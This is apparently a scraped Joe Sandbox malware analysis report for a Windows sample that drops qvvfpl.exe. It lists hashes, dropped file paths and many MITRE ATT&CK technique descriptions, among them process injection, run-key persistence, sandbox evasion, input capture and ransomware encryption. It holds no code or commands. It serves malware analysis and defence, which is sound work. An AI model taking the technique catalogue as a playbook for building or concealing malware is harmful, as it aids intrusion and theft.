Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: eb09740ef60325e7b5e4667d516128b0a14889a4712afac802167a2069a26cde
Instruction ID: 1c48d3238fe9e3b20a71a364984eae59de6640f6f281b5991bc873a4f8c628f2
Opcode Fuzzy Hash: eb09740ef60325e7b5e4667d516128b0a14889a4712afac802167a2069a26cde
Instruction Fuzzy Hash: A8F0F6723483841EF7194A689C41BA1BBCD9B55310F98447FEACDC2291F6A58981D375

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eW1QrimJYd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
eW1QrimJYd.exe

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre